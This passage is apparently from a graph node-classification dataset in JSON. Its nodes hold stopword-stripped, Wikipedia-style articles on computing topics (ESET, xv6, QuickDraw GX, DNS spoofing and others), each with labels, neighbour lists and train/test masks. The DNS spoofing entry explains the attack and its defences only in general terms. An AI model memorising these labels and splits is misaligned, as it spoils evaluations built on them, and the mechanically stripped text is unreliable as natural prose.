    "text": "ESET:eset eset security company offers anti-virus firewall products eset nod32 eset headquartered bratislava slovakia awarded recognition successful slovak company 2008 2009 2010 plays significant role overall cybersecurity according gartner peer insights july 2018 main competitors endpoint protection symantec kaspersky lab sophos mcafee trend micro microsoft company founded 1987 miroslav trnka peter paško authors antivirus software nod partnered rudolf hrubý adopted eset name egyptian goddess health marriage love company name 1998 nod received vb100 award virus bulletin helped company establish subsidiaries united states argentina singapore development facilities poland czech republic eset privately held branch offices san diego united states montreal canada buenos aires argentina são paulo brazil prague czech republic kraków poland singapore australia well distributors 180 countries according gartner eset showed largest worldwide growth rate within consumer security industry 2011 eset falls within niche player category gartner magic quadrant according gartner report eset built substantial installed base europe middle east africa particularly eastern europe rapidly growing small medium-sized business presence north america completeness vision score benefits good malware effectiveness lightweight client still suffers weak enterprise management capabilities lack investment market-leading features application control virtualization support eset good shortlist option organizations seeking effective lightweight anti-malware solution according frost sullivan eset offers high-performance proactive endpoint security solutions company goes beyond competition add value products educating mac pc users defend latest cyber threats concluded eset continue maintain strong presence endpoint security market provide high value customers awarded eset 2012 north american endpoint security products customer value enhancement award 2011 global customer value enhancement award yet 20+ years us market eset remains largely unknown consumers territory 6 market share compared competitors like symantec mcafee dominate market despite fact eset market longer eset endpoint security rated five stars sc magazine best antivirus software 2013 award maximum pc received parent tested parent approved seal ptpa media 2009 cnet awarded eset smart security 4 cnet editor choice award internet security suite category reviewers stated eset smart security surprisingly light consuming around 50mb ram running concluded getting security tools one box smart security effective well-respected choice late 2013 maximum pc awarded eset smart security 6 9/10 rating impressed improvements made version 6 reviewers unimpressed user interface stating ’ nothing flashy eset ’ interface ’ modernized windows 8 touchscreen displays although concluded dinged program last year letting nasty containments rare misstep program ’ collected dozen straight vb100 awards virus bulletin past two years fared much better tests time around 2014 eset awarded péter szőr award best piece published technical security research virus bulletin eset products tested certified multiple professional organizations eset received 100 consecutive vb100 awards virus bulletin eset also one first security firms report internal workings hacking techniques sednit hacking group thought responsible 2016 dnc hack also better known fancy bear series detailed techniques complete analysis hacking tools used published series pdf cyber security log website 2 july 2018 eset joined cybersecurity tech accord public commitment among 40 global companies protect cybersecurity end-users eset products include tools smart security internet security nod32 antivirus cyber security endpoint protection windows linux mac android anti-theft encryption parental control also integration plugins kaseya rmm labtech rmm eset remote administrator free central management console designed allow network administrators manage eset software across corporate network february 25 2015 eset released remote administrator 6 completely re-written platform administer eset software browser mobile device eset sysrescue live linux-based bootable live cd/usb image used boot clean heavily-infected computers independent installed operating system program offered free charge download updates network connection present",
    "neighbors": [
      2049,
      3093,
      1052,
      550,
      2601,
      6699,
      9775,
      9791,
      10308,
      7251,
      2654,
      9832,
      10872,
      9341,
      1150,
      127,
      7809,
      156,
      2721,
      2213,
      6823,
      3243,
      6834,
      704,
      7362,
      202,
      1242,
      4314,
      6382,
      5891,
      3342,
      4374,
      6431,
      5924,
      1318,
      8998,
      8489,
      2859,
      4403,
      9523,
      823,
      9537,
      3395,
      4421,
      1355,
      10574,
      6993,
      8024,
      2907,
      7515,
      9055,
      9569,
      11622,
      4464,
      3955,
      2425,
      1925,
      1417,
      3981,
      10637,
      11662,
      5025,
      8614,
      8615,
      6059,
      4013,
      1970,
      10166,
      7103,
      1994,
      5069,
      7633,
      10708,
      2005,
      11225,
      8668,
      2528,
      9713,
      6643,
      10745
    ],
    "mask": "Test"
  },
  {
    "node_id": 132,
    "label": 2,
    "text": "Xv6:xv6 xv6 modern reimplementation sixth edition unix ansi c multiprocessor x86 systems used pedagogical purposes mit operating systems engineering 6.828 course well georgia tech cs 3210 design operating systems course well many institutions unlike linux bsd xv6 simple enough cover semester yet still contains important concepts organization unix rather study original v6 code course uses xv6 since pdp-11 machines widely available original operating system written archaic pre-ansi c. one feature makefile xv6 option produce pdf entire source code listing readable format entire printout 99 pages including cross references reminiscent original v6 source code published similar form lions commentary unix 6th edition source code xv6 used operating systems courses many prestigious universities including northwestern university george washington university northeastern university yale university columbia university ben-gurion university johns hopkins university portland state university tsinghua university southern adventist university university wisconsin–madison binghamton university university utah linnaeus university sweden university otago new zealand national university córdoba national university río cuarto argentina federico santa maría technical university chile università degli studi di palermo university illinois chicago rutgers university università degli studi di modena e reggio emilia italy university tehran iran federal university minas gerais brazil",
    "neighbors": [
      3969,
      6787,
      6412,
      5397,
      1304,
      3487,
      3488,
      546,
      3241,
      7983,
      2864,
      3248,
      2995,
      8627,
      9141,
      823,
      9784,
      9151,
      9027,
      6596,
      10436,
      8262,
      1865,
      1101,
      8909,
      8147,
      9175,
      10971,
      6369,
      10851,
      9320,
      499,
      5363,
      5492,
      2424,
      633,
      2428,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 133,
    "label": 1,
    "text": "PlWordNet:plwordnet plwordnet lexico-semantic database polish language includes sets synonymous lexical units synsets followed short definitions plwordnet serves thesaurus-dictionary concepts synsets individual word meanings lexical units defined location network mutual relations reflecting lexico-semantic system polish language plwordnet also used one basic resources construction natural language processing tools polish plwordnet developed wrocław university technology works carried wrocut language technology group g4.19 since 2005 funded ministry science higher education eu thesaurus built ‘ ground ’ lexicographers natural language engineers first version plwordnet published 2009 – contained 20 223 lemmas 26 990 lexical units 17 695 synsets recent version plwordnet 2.2 made available may 13 2014 currently plwordnet contains 148k lemmas 207k lexical units 151k synsets already outgrown princeton wordnet respect number lexical units plwordnet consists nouns 116k verbs 18k adjectives 13k meaning given word separate lexical unit units represent concept differ significantly stylistic register combined synsets sets synonyms lexical unit assigned one domains semantic categories indicating general meaning plwordnet domains correspond princeton wordnet lexicographers ’ files lexical units provided information stylistic register short definition usage examples link relevant wikipedia article important element defining words meanings lexico-semantic derivational relations hold synsets lexical units one synset groups lexical units share set relations based relations assigned synsets units tools natural language processing conclude meaning lemma important example word-sense disambiguation polish synsets connected corresponding princeton wordnet synsets set inter-lingual lexico-semantic relations instance synonymy partial synonymy hyponymy 91 578 synsets mapped far amounts 2/3 plwordnet synsets among mainly nouns mapping enables application plwordnet machine translation e.g online service offered google translate plwordnet available open access license allowing free browsing made available users form online dictionary mobile application web services application plwordnet",
    "neighbors": [
      416,
      7780,
      10020,
      2901,
      538,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 134,
    "label": 3,
    "text": "Super_VGA:super vga super video graphics array ultra video graphics array almost always abbreviated super vga ultra vga svga uvga broad term covers wide range computer display standards svga standard developed 1988 nec home electronics announced creation video electronics standards association vesa development svga led nec along vesa members including ati technologies western digital svga enabled graphics display resolutions 800×600 pixels 36 vga maximum resolution 640×480 pixels originally extension vga standard first released ibm 1987 unlike vga—a purely ibm-defined standard—super vga never formally defined closest official definition vbe extensions defined video electronics standards association vesa open consortium set promote interoperability define standards document simply footnote stating term 'super vga used document graphics display controller implementing superset standard ibm vga display adapter used resolution specification contrast vga xga example term svga normally refers resolution 800x600 pixels 1988 nec home electronics announced creation vesa association develop promote super vga computer display standard successor ibm proprietary vga display standard super vga would enable graphics display resolutions 800×600 pixels compared vga maximum resolution 640×480 pixels—a 36 increase members vesa worked svga standard include ati technologies western digital though super vga cards appeared 1988 1989 standard programming super vga modes defined vesa first version defined support require maximum resolution 800 × 600 4-bit pixels pixel could therefore 16 different colors quickly extended 1024 × 768 8-bit pixels well beyond following years although number colors defined vbe specification irrelevant referring super vga monitors contrast old cga ega standards interface video card vga super vga monitor uses simple analog voltages indicate desired color consequence far monitor concerned theoretical limit number different colors displayed applies vga super vga monitor output vga super vga video card analog internal calculations card performs order arrive output voltages entirely digital increase number colors super vga display system reproduce change needed monitor video card needs handle much larger numbers may well need redesigned scratch even leading graphics chip vendors producing parts high-color video cards within months super vga introduction paper original super vga succeeded super xga practice industry soon abandoned attempt provide unique name higher display standard almost display systems made late 1990s early 2000s classed super vga monitor manufacturers sometimes advertise products xga super xga practice means little since super vga monitors manufactured since later 1990s capable least xga usually considerably higher performance svga uses vga connector de-15 a.k.a hd-15 original standard see also digital visual interface common non-analog cable svga resolutions early supervga manufacturers parentheses models available svga effectively supported resolutions like 1280x800 higher",
    "neighbors": [
      7713,
      2594,
      8355,
      6570,
      6028,
      8301,
      11631,
      11634,
      8281,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 135,
    "label": 4,
    "text": "Higgins_project:higgins project higgins open-source project dedicated giving individuals control personal identity profile social network data project organized three main areas initial code higgins project written paul trevithick summer 2003 2004 effort became part socialphysics.org collaboration paul mary ruddy azigo formerly parity communications inc. meristic john clippinger berkman center internet society higgins original name eclipse trust framework accepted eclipse foundation early 2005 mary paul project co-leads ibm novell participation project announced early 2006 higgins received technology contributions ibm novell oracle ca serena google eperi gmbh well several firms individuals version 1.0 released february 2008 2019 eclipse higgins archived meaning inactive project",
    "neighbors": [
      8227,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 136,
    "label": 9,
    "text": "Extensible_Embeddable_Language:extensible embeddable language extensible embeddable language eel scripting programming language development david olofson eel intended scripting realtime systems cycle rates khz range musical synthesizers industrial control systems also aspires usable platform independent general purpose programming language language design general idea strike practical balance power ease use safety intention help avoiding many typical programming mistakes without resorting overly wordy syntax restricted functionality first incarnation eel form simple parser structured audio definitions used sound engine free open source game kobo deluxe sdl port x11 game xkobo simple interpreter limited flow control syntax quite different current versions initial branch eel first released 2002 still used kobo deluxe version 0.5.1 december 2003 eel split stand-alone project subject major rewrite order used real time scripting embedded rheology application switch interpreter compiler/vm made actual programming language eel materialized first official release january 2005 since eel evolved slowly driven mostly personal professional needs author language strictly designed particular programming paradigm supports object oriented programming specifically prototype-based programming minimal set syntax sugar features paradigms functional modular metaprogramming also supported result avoiding pointers providing fully managed structured data types eel safe sense eel programs able crash virtual machine host application classic hello world program written follows following example recursive function eel source code compiled bytecode custom vm relatively high level instruction set designed minimize instruction count thus overhead eel vm register based stackless relying c call stack managing vm contexts basic memory management method reference counting allows automatic memory management deterministic timing without need concurrent garbage collection vm uses limbo lists keep track intermediate objects created inside expressions like greatly simplifies exception handling eliminates need active reference counting every single operation kobo deluxe application eel",
    "neighbors": [
      1952,
      9345,
      8262,
      4777,
      5612,
      8524,
      7983,
      5040,
      10480,
      9714,
      9780,
      11674,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 137,
    "label": 2,
    "text": "QuickDraw_GX:quickdraw gx quickdraw gx replacement quickdraw qd 2d graphics engine printing manager inside classic mac os underlying drawing platform resolution-independent object oriented retained mode system making much easier programmers perform common tasks compared original quickdraw additionally gx added various curve-drawing commands lacking qd well introducing truetype basic font system gx certainly addressed many problems qd time available developers already developed solutions problems anyway gx also suffered causing number incompatibilities existing programs notably developed qd extensions coupled opposition important fraction developer market especially postscript owner adobe lack communication apple benefits gx users adopt led technology sidelined quickdraw gx eventually killed purchase next eventual adoption quartz imaging model mac os x many component features lived standard current macintosh platform 80s wore quickdraw architectural limitations began impose limits apple third-party developers gx appears started roundabout fashion originally outline font system would added mac os included font rendering engine number generally useful extensions notably fixed point coordinate system variety curve drawing commands system also included system wrapping existing postscript type 1 fonts internal format added bitmap preview versions quick on-screen rendering project later took expanded role apple microsoft agreed work together form alternative postscript fonts extremely expensive creating truetype effort based apple existing efforts another project apparently unrelated first attempted address problems conversion quickdraw various printer output formats whereas developers earlier forced write code convert quickdraw on-screen display postscript printing new printer architecture conversions would provided os additionally new system deliberately engineered flexible possible supporting qd ps printers potentially standards hewlett packard pcl well system also supported desktop printers printers appeared icons user desktop long sought-after feature missing qd added improved printing dialogs controls clear projects merged common theme apple time middle-managers involved intense turf war much late 80 early 90 gathering projects together über-projects contained enough important code make unkillable sadly often delayed projects dramatically one component running behind schedule forced entire collection delayed could released complete quickdraw gx one victim delays changes direction truetype problems greatly delayed introduction gx discussions gx technology started appearing various trade magazines around 1992 notably apple develop time appeared release imminent perhaps late 1992 early 1993 gx initially released january 1995 separate package version 1.1.1 bundled system 7.5 later year system received dull thud package large enough strain memory existing macintosh computers era arguments like print postscript less impressive considering many existing programs already added support users developers generally ignored gx market system simply never appeared appears one reason gx failure market certainly number conspired lessen appeal one thing gx large requiring much memory rest os speed also issue limiting running macs motorola 68020 better given installed mac base time still contained large numbers 68000 based machines like mac plus requirements restricted number machines could run first released one review noted quickdraw gx n't everyone requires ram many macs spare additionally api system large filling several books implementing gx program easy feat even though development supposed much easier problem gx architecture side effect inclusive nature system — problem apple products era suffered see powertalk instance result developer appeal limited lot effort would required use system programs resulting application could run subset installed base — let alone upcoming windows 95 midst unprecedented media blitz number gx-based opposed gx- compatible programs could counted one hand one example pixar typestry additionally change printing systems presented serious real-world issues postscript printing never easy years since release original laserwriter developers built library solutions common problems change architecture gx stopped working new gx drivers needed printers well apple n't supply drivers printers let alone third-party ones printing problems endemic difficult fix users often gave system frustration user uptake gx close zero case new technologies apple released early 1990s might seen widespread use part copland project copland never launched although apple continued state gx future graphics mac 1995 clear longer pushing frustrating supporters mac os 8 dropped support gx printing architecture though text management color management architectures survived elements text management architecture became part truetype specification elements color management architecture became part international color consortium specification advent mac os x portions gx live apple type services unicode imaging atsui colorsync whose file format identical original format developed gx quickdraw gx based object oriented model graphics objects aware responsible state unlike quickdraw universal state every drawing command re-construct state data stored within various parent objects instance programmer could build codice_1 object first sets color red draws square point program longer explicitly set color drawing gx system always correctly set drawing color asked draw codice_1 reset finished since state private sent gx needed gx theoretically allowed mac os support protected memory state longer shared directly programs graphics system contrasts strongly original quickdraw programmer responsible state changes instance one draw redbox series lines lines would also appear red unless programmer explicitly changed color first advantage approach minimizes number commands needed set state programmer organize drawing draw groups similarly styled objects time thereby save time disadvantage approach easy forget change state end causing problems easy programmers often saved restored complete state every drawing command thereby potentially lowering performance drawing state gx hierarchical default drawing mode created every window qd drawing objects state changes would use defaults programmer could change state objects codice_1 example alternately change state drawing setting state window object gx objects could easily collected groups objects allowing state set entire complex object one part overall drawing state codice_4 3-by-3 matrix could express arbitrary linear transformations two dimensions including perspective distortions gx objects associated mapping part drawing state allowed things like rotations translations although state held codice_4 object gx also provided wrapper commands like rotate make api simpler use unlike quickdraw quickdraw gx allowed fractional coordinates however fixed-point values rather floating-point time gx developed late 1980s early 1990s still significant performance penalty using floating-point arithmetic gx graphics architecture built around number types objects premade though full set api calls available examining manipulating gx shapes could various types typography features gx integrated form 3 types gxshape gx api also provided hit-testing functions example user clicked layout shape middle ligature region change text direction gx would provide smarts determine character position original text corresponded click important distinction gx drawn character glyph distinction also found unicode standard character abstract symbol character set writing system letter f writing systems latin script whereas glyph specific graphic shape particular font whether shape represented single character set characters thus example hoefler text font glyphs represent letters f l also another glyph represent ligature ﬂ could automatically composed instead individual glyphs wherever two abstract characters f l occurred sequence source text distinction important contextual substitutions occurred rendering time without changes source character string thus impact editing searching text postscript type 1 font files one one mapping ligatures many one mappings inserted composition without changing source character string instance ligature ffi placed position capital adobe font products adobe offices composed typing adobe change font change font ces layout character string broken pdf made streamed postscript characters f+f+i reconstructed name glyph follows glyph naming list contextual substitutions controlled enabling disabling composition options truetype gx font worldtext mac os 9 cd textedit mac os x. fonts commonly features called common ligatures fl example rare ligatures inscriptional md ligatures archaic non-terminal automatically substituting letter archaic form looked like f except ends words even choices entirely separate sets glyph designs less ornate forms rules performing contextual substitutions implemented state machines built font interpreted llm line layout manager counterpart cmm color management module colorsync services text management operating system allowed quickdraw gx accept character strings mix writing systems scripts compose strings automatically whether encoding unicode 1.0 8 bit 8/16 bit encodings another interesting feature font variations gx equivalent adobe multiple master fonts whereas adobe fonts required user explicitly create instance font specifying values variation axes could use gx allowed user specify font directly layout style dynamically vary axis values immediately observe effect layout text technology became core microsoft adobe would adopt 2016 development so-called ‘ opentype variable fonts ” truetype gx",
    "neighbors": [
      576,
      1729,
      4836,
      9700,
      6377,
      4910,
      6830,
      2676,
      7286,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 138,
    "label": 4,
    "text": "DNS_spoofing:dns spoofing dns spoofing also referred dns cache poisoning form computer security hacking corrupt domain name system data introduced dns resolver cache causing name server return incorrect result record e.g ip address results traffic diverted attacker computer computer domain name system server translates human-readable domain name codice_1 numerical ip address used route communications nodes normally server know requested translation ask another server process continues recursively increase performance server typically remember cache translations certain amount time means receives another request translation reply without needing ask servers cache expires dns server received false translation caches performance optimization considered poisoned supplies false data clients dns server poisoned may return incorrect ip address diverting traffic another computer often attacker normally networked computer uses dns server provided internet service provider isp computer user organization dns servers used organization network improve resolution response performance caching previously obtained query results poisoning attacks single dns server affect users serviced directly compromised server serviced indirectly downstream server applicable perform cache poisoning attack attacker exploits flaws dns software server correctly validate dns responses ensure authoritative source example using dnssec otherwise server might end caching incorrect entries locally serve users make request attack used redirect users website another site attacker choosing example attacker spoofs ip address dns entries target website given dns server replaces ip address server control attacker creates files server control names matching target server files usually contain malicious content computer worms viruses user whose computer referenced poisoned dns server gets tricked accepting content coming non-authentic server unknowingly downloads malicious content technique also used phishing attacks fake version genuine website created gather personal details bank credit/debit card details following variants entries server would poisoned redirected attacker name server ip address attacks assume name server accomplish attacks attacker must force target dns server make request domain controlled one attacker nameservers first variant dns cache poisoning involves redirecting name server attacker domain name server target domain assigning name server ip address specified attacker dns server request address records attacker response vulnerable server would cache additional a-record ip address allowing attacker resolve queries entire domain second variant dns cache poisoning involves redirecting nameserver another domain unrelated original request ip address specified attacker dns server request address records attacker response vulnerable server would cache unrelated authority information ns-record nameserver entry allowing attacker resolve queries entire domain many cache poisoning attacks dns servers prevented less trusting information passed dns servers ignoring dns records passed back directly relevant query example versions bind 9.5.0-p1 perform checks source port randomization dns requests combined use cryptographically secure random numbers selecting source port 16-bit cryptographic nonce greatly reduce probability successful dns race attacks however routers firewalls proxies gateway devices perform network address translation nat specifically port address translation pat may rewrite source ports order track connection state modifying source ports pat devices may remove source port randomness implemented nameservers stub resolvers secure dns dnssec uses cryptographic digital signatures signed trusted public key certificate determine authenticity data dnssec counter cache poisoning attacks 2008 yet widely deployed 2010 dnssec implemented internet root zone servers kind attack mitigated transport layer application layer performing end-to-end validation connection established common example use transport layer security digital signatures example using https secure version http users may check whether server digital certificate valid belongs website expected owner similarly secure shell remote login program checks digital certificates endpoints known proceeding session applications download updates automatically application embed copy signing certificate locally validate signature stored software update embedded certificate",
    "neighbors": [
      4224,
      2947,
      5254,
      11,
      9744,
      3473,
      1692,
      9117,
      10915,
      3625,
      939,
      5887,
      5045,
      8630,
      3643,
      7739,
      3777,
      6209,
      4163,
      3781,
      2887,
      7037,
      2003,
      7515,
      4956,
      11358,
      2661,
      9193,
      6513,
      5749,
      8054,
      8055,
      2041,
      6013,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 139,
    "label": 2,
    "text": "Tag_(programming):tag programming programming tag argument subroutine determines arguments passed used way pass indefinite number tagged parameters subroutine notably tags used number system calls amigaos v2.0 onwards earlier versions amigaos system call required setting large number parameters instead passing function arguments function would require pointer structure holds arguments example intuition.library codice_1 required codice_2 17 different parameters tags introduced amigaos 2.0 make possible add new parameters system functions without interfering original parameters also make specifying parameter lists much clearer easier number third-party software libraries amigaos also use tags extensively note code without tags obscure example codice_3 define window colors code tags self-documenting note also fewer parameters defined tags structure openwindowtags fall back default parameters amigaos provides functions tag handling codice_4 advantage tags ease work default arguments since programmer n't specify substitutes follows another advantage ease achieving forward backward compatibility external libraries program written older version library work newer one since newer library simply set parameters provided program default values program written newer version library still work older version since older library simply pay attention newly introduced tags disadvantage tags processing slower simply reading data structure stack additionally compile time type checking lost",
    "neighbors": [
      5264,
      2193,
      9236,
      10013,
      3233,
      9249,
      8618,
      6062,
      432,
      8369,
      8115,
      11076,
      10570,
      5709,
      3923,
      4564,
      1501,
      11370,
      5743,
      11123,
      2804
    ],
    "mask": "Test"
  },
  {
    "node_id": 140,
    "label": 5,
    "text": "Z39.50:z39.50 z39.50 international standard client–server application layer communications protocol searching retrieving information database tcp/ip computer network covered ansi/niso standard z39.50 iso standard 23950 standard maintenance agency library congress z39.50 widely used library environments often incorporated integrated library systems personal bibliographic reference software interlibrary catalogue searches interlibrary loan often implemented z39.50 queries work z39.50 protocol began 1970s led successive versions 1988 1992 1995 2003 contextual query language formerly called common query language based z39.50 semantics protocol supports search retrieval sort browse search queries contain attributes typically bib-1 attribute set defines six attributes specify information searches server computer use relation position structure truncation completeness syntax z39.50 allows complex queries practice functional complexity limited uneven implementations developers commercial vendors syntax z39.50 abstracted underlying database structure example client specifies author search using attribute 1003 server must determine map search indexes contains allows z39.50 queries formulated without knowing anything target database also means results query vary widely among different servers one server may author index another may use index personal names whether authors third may name index fall back keyword index yet another may suitable index return error attempt remedy inconsistency bath profile named bath england working group first met 1999 document rigidly specifies search syntax employ common bibliographic searches expected response bath-compliant servers implementation bath profile slow gradually improving z39.50 landscape bath profile maintained library archives canada z39.50 pre-web technology various working groups attempting update fit better modern environment attempts fall designation zing z39.50 international next generation pursue various strategies successors z39.50 twin protocols sru/srw search/retrieve via url search/retrieve web service drop z39.50 communications protocol replacing http still attempting preserve benefits query syntax sru rest-based enables queries expressed url query strings srw uses soap expect search results returned xml projects much lower barrier entry developers original z39.50 protocol allowing relatively small market library software benefit web service tools developed much larger markets alternatives include following registered internet ip port z39.50 210 although majority servers use port dozens port numbers used worldwide z39.50 e.g 2100 2200 2210 2213 3520 one case ports 2101 higher different databases",
    "neighbors": [
      7575,
      10020,
      6629,
      9669,
      8639,
      10313,
      3979,
      2318,
      8046,
      113,
      6993,
      9043,
      3191,
      2901,
      119,
      8440,
      1371,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 141,
    "label": 4,
    "text": "TokenEx:tokenex tokenex cloud-based data security company headquartered tulsa oklahoma company founded 2010 alex pezold provides solutions coupling tokenization data security encryption key management ensuring secure data specializes tokenization data security sensitive customer data world vision international one clients using tokenex platform 28 february 2018 company announced partnership cloud constellation design space-based data security solution layers tokenization secure storage space securing customers sensitive data 2016 metro 50 award recognized metro 50 ’ fastest growing privately held company greater oklahoma city chamber",
    "neighbors": [
      3880,
      2154,
      2932,
      3629
    ],
    "mask": "None"
  },
  {
    "node_id": 142,
    "label": 5,
    "text": "Syslog-ng:syslog-ng syslog-ng free open-source implementation syslog protocol unix unix-like systems extends original syslogd model content-based filtering rich filtering capabilities flexible configuration options adds important features syslog like using tcp transport today syslog-ng developed balabit security ltd two editions common codebase first called syslog-ng open source edition ose license lgpl second called premium edition pe additional plugins modules proprietary license january 2018 syslog-ng part balabit acquired one identity global vendor identity access management solutions quest software umbrella syslog-ng team remains independent business within one identity organization continues develop open source commercial solutions syslog-ng brand syslog-ng uses standard bsd syslog protocol specified rfc 3164 text rfc 3164 informational description standard incompatible extensions emerged since version 3.0 syslog-ng also supports syslog protocol specified rfc 5424. syslog-ng interoperates variety devices format relayed messages customized extensions original syslog-ng protocol include syslog-ng project began 1998 balázs scheidler primary author syslog-ng ported existing nsyslogd code linux 1.0.x branch syslog-ng still based nsyslogd sources available syslog-ng source archive right release syslog-ng 1.0.x reimplementation code base started address shortcomings nsyslogd address licensing concerns darren reed original nsyslogd author reimplementation named stable october 1999 release version 1.2.0 time around syslog-ng depended code originally developed lsh niels möller three major releases 1.2 1.4 1.6 using code base last release 1.6.x branch february 2007 period 8 years syslog-ng became one popular alternative syslog implementations volunteer based effort yet another rewrite started back 2001 dropping lsh code using widely available glib library rewrite codebase took time first stable release 2.0.0 happened october 2006 development efforts focused improving 2.0.x branch support 1.6.x dropped end 2007 support 2.x dropped end 2009 still used linux distributions balabit company behind syslog-ng started parallel commercial fork syslog-ng called syslog-ng premium edition portions commercial income used sponsor development free version syslog-ng version 3.0 released fourth quarter 2008 starting 3.0 version developments efforts parallel premium open source editions pe efforts focused quality transport reliability performance encrypted log storage open source edition efforts focused improving flexibility core infrastructure allow different non-syslog message sources ose pe forks produced two releases 3.1 3.2 2010. syslog-ng provides number features addition transporting syslog messages storing plain text log files syslog-ng available number different linux unix distributions install system default provide package replaces previous standard syslogd several linux distributions used syslog-ng replaced rsyslog syslog-ng highly portable many unix systems old new alike list currently known work unix versions found list based balabit current first hand experience platforms may also work mileage may vary",
    "neighbors": [
      961,
      6273,
      3142,
      5384,
      5356,
      823,
      6797,
      3983,
      7983,
      8944,
      9964,
      5523,
      5492,
      5397,
      10924,
      1399,
      1304,
      11221
    ],
    "mask": "Test"
  },
  {
    "node_id": 143,
    "label": 2,
    "text": "QuickDraw_3D:quickdraw 3d quickdraw 3d qd3d short 3d graphics api developed apple inc. apple computer inc. starting 1995 originally macintosh computers delivered cross-platform system qd3d separated two layers lower level system known rave rendering acceleration virtual engine provided hardware abstraction layer functionality similar direct3d cut-down versions opengl like minigl top object-oriented scene graph system qd3d proper handled model loading manipulation level similar opengl++ system also supplied number high-level utilities file format conversion standard viewer application mac os qd3d little impact computer market result apple beleaguered position mid-1990s well several fateful decisions made design team future changes 3d hardware market come true apple abandoned work qd3d steve jobs took 1998 announced future 3d support mac os would based opengl canonical 3d api 1990s opengl written sgi initially closely matched capabilities workstation systems operating hardware abstraction layer opengl api consisted mostly state-setting instructions setting drawing modes like paint color camera position system sending geometry system normally meshes triangles combination instructions saved display list rendered produce output opengl lacked many features needed produce complete 3d program saving loading geometry data collecting data groups produce model objects control state left programmer considered advantage era performance limited direct control sorts functions route improved performance however lack high-level functionality make difficult quickly write simple programs well leading lack interoperability number efforts started provide standardized higher level apis like opengl++ later fahrenheit handled many common bookkeeping tasks like loading geometry files providing display standardized scene graph systems meant programmer provide gui program opengl mostly low-level include higher-level concepts really used sgi systems led another series apis removed features make easier implement common hardware best known minigl separate api simply list functions opengl guaranteed supported across hardware thus ensuring program limiting calls run maximum performance qd3d designed start operate computers considerably less power workstations led concerted effort cleanly separate upper lower layers api lower-level rave system closer minigl start advantage providing clean minimal api could easily ported different hardware since rave needed ported upper layer apis could made complex desired qd3d system included complete scene graph standardized model file format 3dmf even basic gui objects utilized write simple application qd3d programmer include libraries place gui elements program using resedit similar tools additional functionality included plug-in rendering system allowed application render scene variety styles without changing model code developers could render scene interactively suitable plug-ins using methods ray-tracing phong shading qd3d api object-like system based pure-c code various structures carefully constructed contain pointers important objects objects knew drawing state needed thereby eliminating code would normally needed developing opengl downside qd3d layering introduced performance issues instance system stored automatically set state every object drawing made development much easier also made performance drop way developer direct control applications demanding performance ease programming could instead choose use rave layer directly another area concern scene graph hidden view considerable improvements rendering performance made carefully culling graph remove objects view although later releases qd3d gained ability automatically perform visibility culling based grouping objects scene graph opengl lack support feature typically forced developers implement start good low-level 3d performance relies programmer provide efficient models high-quality drivers hardware well although rave designed cross-platform hardware developers supported mac ati nvidia 3dfx produced drivers left comparison qd3d alternative apis one-sided outside mac qd3d forced fall back software rave implementation opengl gained traction windows often credited id software championed api d3d hardware developers increasingly designing future hardware future feature set planned microsoft ’ d3d extension mechanism opengl able track changes relatively easily rave ’ feature set remained relatively fixed macworld expo january 1999 apple announced neither quickdraw 3d rave would included mac os x company laid development staff june 1999 replacing in-house technology opengl buying mac implementation key staff connectix apple withdrew support qd3d open source implementation qd3d api developed externally known quesa implementation combines qd3d ’ higher level concepts opengl renderer well cross-platform hardware acceleration library also allows use qd3d api platforms never supported apple linux latest release 2008 applications published employing rave include",
    "neighbors": [
      10051,
      9700,
      2921,
      2282,
      6377,
      823,
      2045,
      2943
    ],
    "mask": "Train"
  },
  {
    "node_id": 144,
    "label": 4,
    "text": "Michael_Schroeder:michael schroeder michael schroeder american computer scientist areas research include computer security distributed systems operating systems perhaps best known co-inventor needham–schroeder protocol 2001 co-founded microsoft research silicon valley lab assistant managing director lab disbanded 2014 schroeder born 1945 richland washington undergraduate work washington state university went graduate school mit obtaining phd 1972 starting 1976 mit eecs department faculty xerox parc dec systems research center mit involved multics contributions included seminal work security architecture shared information systems systems built grapevine distributed system filesystem cedar topaz distributed os autonet lan pachyderm web based email 2004 inducted fellow association computing machinery 2006 acm sigsac presented outstanding innovations award technical contributions field computer communication security lasting impact furthering understanding theory and/or development commercial systems 2007 nist/nsa gave national computer systems security award 2008 acm sigops chose paper grapevine exercise distributed computing coauthored hall fame award recognizes influential operating systems papers peer-reviewed literature least ten year old leading expert american landscape painter gilbert munger 1837-1903 authors web-based catalogue raisonné archive period documents j gray sweeney arizona state university wrote book gilbert munger quest distinction afton historical society press 2003",
    "neighbors": [
      10944,
      5363,
      6772,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 145,
    "label": 3,
    "text": "Fray_in_Magical_Adventure:fray magical adventure fray magical adventure also known fray フレイ fray-xak epilogue gai-den 1990 spin-off gaiden sidestory game role-playing video game series xak developed published japanese software developer microcabin even though directly connected serious xak storyline fray less serious tone light-hearted comedic approach telling story originally released msx2 later ported several different systems among msx turbo r pc-9801 pc engine fray cd game gear fray simple action rpg game proceeds player character fray fighting preset overhead view map shooting opposing monsters jumping obstacles locating powerups gold game currency along way end stage player fight boss enter town safe player purchase new equipment hit points option save progress fray advances power items equip different rods shields battles real-time fray walks around automatic vertically scrolling game map well monster characters attack defense rating switch different projectile weapon styles well use special attacks healing items fray features typical high fantasy setting according game world legends great war fought benevolent weakening ancient gods demon race led collapse eventual mortality gods 'war sealing gods divided world three parts xak world humans oceanity world faeries zekisis world demons demon world zekisis tightly sealed two worlds prevent reentry warmongering demon race demons left behind xak however others managed discover separate means enter xak zekisis anyway ancient history displayed introduction story fray takes place events xak events xak ii xak fray able use magic less helpless girl rescued hero xak series latok kart rescued fray becomes romantically interested latok decides could become useful latok aid quests perhaps latok interested romantically return starting end xak fray goes attends magical university three years learn become full-fledged sorceress upon graduation fray travels latok home town fearless find latok however upon arriving fray learns latok decided journey ahead region banuwa start new quest xak ii fray decides give finding latok decides set adventure heads banuwa village course game takes fray several places along way including various villages ancient ruins lake center volcano floating fortress fray originally released msx december 6 1990 later versions developed msx turbo r nec pc-9801 nec pc-engine sega game gear 1991-1994 extended version fray magical adventure 